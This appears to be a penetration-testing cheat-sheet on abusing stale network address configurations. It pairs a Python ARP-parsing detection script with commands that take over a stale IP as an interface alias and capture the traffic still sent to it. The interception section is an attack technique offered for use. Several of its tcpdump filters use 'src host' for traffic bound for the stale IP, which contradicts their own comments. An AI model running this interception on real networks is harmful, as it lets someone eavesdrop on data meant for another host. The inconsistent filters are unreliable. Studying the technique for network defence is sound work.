SNACs Abuse

Stale Network Address Configuration

Actively analyze ARP traffic and hunt for SNACs (Stale Network Address Configurations):

$ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11]
# -ar / -dr: resolve ARP and DNS (A/PTR) for the hosts seen; --blacklist excludes your own or known-noisy hosts
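The core of that hunt, as an added example that is not part of eavesarp or this page: parse the ARP summary lines tcpdump prints (the who-has/is-at regexes assume `tcpdump -n` output, with or without the bracketed MAC that -vv adds) and report every target that is repeatedly asked for but never replies, together with the hosts still asking for it. Those senders are the machines whose configuration still points at the stale address and need fixing; the sample lines are constructed.

```python
import re
from collections import Counter, defaultdict

# tcpdump's ARP summary text; the optional "(mac)" group covers -vv output.
REQ = re.compile(r"Request who-has ([\d.]+)(?: \([^)]*\))? tell ([\d.]+)")
REP = re.compile(r"Reply ([\d.]+) is-at ")

# Constructed sample (not a real capture): .10 and .30 keep asking for .50,
# which never answers; .20 asks for .51, which does.
SAMPLE_LINES = """\
10:00:01.000000 ARP, Request who-has 192.168.1.50 tell 192.168.1.10, length 28
10:00:02.000000 ARP, Request who-has 192.168.1.50 tell 192.168.1.10, length 28
10:00:03.000000 ARP, Request who-has 192.168.1.51 tell 192.168.1.20, length 28
10:00:03.000100 ARP, Reply 192.168.1.51 is-at 00:11:22:33:44:55, length 28
10:00:04.000000 ARP, Request who-has 192.168.1.50 tell 192.168.1.10, length 28
10:00:05.000000 ARP, Request who-has 192.168.1.50 tell 192.168.1.30, length 28
""".splitlines()


def parse_arp(lines):
    """Yield ('req', target, sender) or ('rep', ip) from tcpdump ARP lines."""
    for line in lines:
        m = REQ.search(line)
        if m:
            yield ("req", m.group(1), m.group(2))
            continue
        m = REP.search(line)
        if m:
            yield ("rep", m.group(1))


def find_snac_candidates(lines, min_requests=3):
    """Map each target IP requested at least min_requests times that never
    sent an ARP reply to {sender_ip: request_count} for the hosts asking."""
    asked = defaultdict(Counter)   # target -> Counter(sender -> requests)
    answered = set()               # IPs seen as the sender of a reply
    for rec in parse_arp(lines):
        if rec[0] == "req":
            asked[rec[1]][rec[2]] += 1
        else:
            answered.add(rec[1])
    return {t: dict(c) for t, c in asked.items()
            if t not in answered and sum(c.values()) >= min_requests}


if __name__ == "__main__":
    # Feed it live with: sudo tcpdump -n -l -i eth0 arp | python3 snac_hunt.py
    for target, senders in find_snac_candidates(SAMPLE_LINES).items():
        print(f"{target} never replies; still requested by {senders}")
```

Unanswered requests also come from hosts that are merely down for a while, so raise `min_requests` or watch over a longer window and confirm a hit with the A/PTR mismatch check before treating the sender as misconfigured.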

If a SNAC is found (it can be detected, for example, when a host has moved from one IP to another and its DNS A record no longer matches its DNS PTR record) and some application on the network is still sending sensitive data to the stale IP address (because it may simply be hard-coded in the app), an adversary can add an alias for that stale IP on their own interface, pretending to be the moved host, and collect all the traffic still intended for it:

# Check again with tcpdump that the stale IP is really unanswered (only requests, no replies from it)
$ sudo tcpdump -nvv -i eth0 "src host <STALE_IP> and arp"

# Abuse it! Watch the plaintext/TLS traffic destined for the stale IP ...
$ sudo tcpdump -nA -i eth0 "src host <STALE_IP> and (dst port 80 or dst port 443)"
# ... or write everything involving that host to a pcap for later analysis
$ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host <STALE_IP>"
# Add the stale IP as an alias so that the traffic actually reaches this interface
$ sudo ip addr add <STALE_IP>/24 dev eth0

# Clean up
$ sudo ip addr del <STALE_IP>/24 dev eth0
